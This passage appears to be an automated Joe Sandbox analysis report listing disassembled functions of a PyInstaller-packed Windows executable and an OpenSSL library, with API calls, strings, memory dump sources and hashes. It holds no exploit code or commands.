                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6419063B0C65282FA14DB1AA8006B963A1FF44BC8F944432EF4D877A6DE3CF542C781
                                                                                                                                                                                                                                              Function 00007FF6B7508660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF6B7503CBB), ref: 00007FF6B7508704
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6B7503CBB), ref: 00007FF6B750870A
                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00007FF6B7503CBB), ref: 00007FF6B750874C
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508830: GetEnvironmentVariableW.KERNEL32(00007FF6B750388E), ref: 00007FF6B7508867
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6B7508889
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7518238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B7518251
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502810: MessageBoxW.USER32 ref: 00007FF6B75028EA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                              • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                              • Instruction ID: 0451fa2114ab74bd34c4994a820669fee330068cecfac1ec0c0dd47de738734d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04418B13A1DA5244FA24AB69A8556F91390AF887C8F800131EF0DD7BFAEE3CF546C600
                                                                                                                                                                                                                                              Function 00007FFE00777250 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 327COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007B6570
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
                                                                                                                                                                                                                                              • API String ID: 4069847057-331183818
                                                                                                                                                                                                                                              • Opcode ID: 3e8f7dbaccdc9d46899aacf333f9608422b89dcb9bc9042fe5e6119822def30e
                                                                                                                                                                                                                                              • Instruction ID: dd84eaeb9ceed5cab540969418d539e8b7c796fd12d7bd69333a86404e821fbe
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e8f7dbaccdc9d46899aacf333f9608422b89dcb9bc9042fe5e6119822def30e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDD1B372A0E68246FB6AAB19944077966E1FB457C0F5C4035EB8E977BDDE3CE841CB00
                                                                                                                                                                                                                                              Function 00007FF6B750EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                                              • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                              • Instruction ID: 0f6f161b265eec980ae33d0b35f7936975ffc0c3fa9cf963a21a6fa9547c57f1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FD16C73A0CB458AEB60AB6994403AD77A0FB4578CF240139EF4D97BA6DF38E591C700
                                                                                                                                                                                                                                              Function 00007FFE00762536 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 214COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007E20033420ErrorLast
                                                                                                                                                                                                                                              • String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
                                                                                                                                                                                                                                              • API String ID: 1442048445-502574948
                                                                                                                                                                                                                                              • Opcode ID: 2e1670e1f7658ee105d96da9602f9016c1545a8356d93c4e666a0015e6880cd8
                                                                                                                                                                                                                                              • Instruction ID: 61bf428e324aa5d91f91d749e8a93d7f034a90efdd0eb4a0a70ea8e7998f36ce
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e1670e1f7658ee105d96da9602f9016c1545a8356d93c4e666a0015e6880cd8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A918551A1E68381FA61BB55A4113BE6261EF857C4F8C4036EB8E47BBEDF3CE8058711
                                                                                                                                                                                                                                              Function 00007FF6B751ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6B751F0AA,?,?,000001B5FBF896E8,00007FF6B751AD53,?,?,?,00007FF6B751AC4A,?,?,?,00007FF6B7515F3E), ref: 00007FF6B751EE8C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6B751F0AA,?,?,000001B5FBF896E8,00007FF6B751AD53,?,?,?,00007FF6B751AC4A,?,?,?,00007FF6B7515F3E), ref: 00007FF6B751EE98
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                              • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                              • Instruction ID: 1a252455fc8a62a46ca0f6c63a2c6b021a8bc9698c9119a396aa3725651b37a7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE41C763B1DA2245EA15DF1A98106752391BF49B92F89863DDF1DC7BB4EF3CE4858300
                                                                                                                                                                                                                                              Function 00007FF6B7502C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502C9E
                                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502D63
                                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF6B7502D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                              • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                              • Instruction ID: f34275d7c7839644d7230baefb48d72bfd76ee537afc4b6542ef25829316cf4b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD31D827B0CA4542E6219B29B8102AB67A1BF88798F410136EF4DD7779EF3CD646C700
                                                                                                                                                                                                                                              Function 00007FFE00761497 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 306COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
                                                                                                                                                                                                                                              • API String ID: 0-1087561517
                                                                                                                                                                                                                                              • Opcode ID: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
                                                                                                                                                                                                                                              • Instruction ID: 7414625a1290412c6c39387c3d14fc77f1585b0dc37ce68af88517ae7e53cf76
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DD12861B0EA8381FA60BA62D5513FE12A1AF45784F8C4032DF5E57BEEDE7DE5068310
                                                                                                                                                                                                                                              Function 00007FFE007626E4 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 256COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
                                                                                                                                                                                                                                              • API String ID: 0-2528746747
                                                                                                                                                                                                                                              • Opcode ID: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
                                                                                                                                                                                                                                              • Instruction ID: d5438c1ab7d8a43197d8d6ec84fe4488ca1a986aee0f0b9701666be9f4b463cc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32B17E61A0A64295FB21FB52D8402BD2765BF847C4F484033EB8D17BBEDE3CEA458352
                                                                                                                                                                                                                                              Function 00007FF6B750DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DD4D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DD5B
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DD85
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DDF3
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DDFF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                              • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                              • Instruction ID: 6e688795dbb874b520d03be46d44b84a0809813ed08d6bb98db52e5100d8b550
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7131C563B1EB42D1EE529B0AA4106B563A4FF48BA8F594535DF5DC73A0EF3CE4449310
                                                                                                                                                                                                                                              Function 00007FF6B7502A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6B750351A,?,00000000,00007FF6B7503F23), ref: 00007FF6B7502AA0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                              • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                              • Instruction ID: 8c35499528c39134f5f1d509e0d18074a5e02f9d051e11ab1c8276c4dd5abcb8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53218133A1CB8242E7209B59B8417EA63A4FB88784F400136FF8D93669EF7CD2458740
                                                                                                                                                                                                                                              Function 00007FF6B7508570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                                              • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                              • Instruction ID: c57e1a10fdde354a7423a654366036f6bc738cf8d5e9c1db24e7c3ad9794fc4e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31216237A0C68242EB108B59F544A7AA3B0FF957A4F500235EBAD93BF4EE7CE4458700
                                                                                                                                                                                                                                              Function 00007FF6B751B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
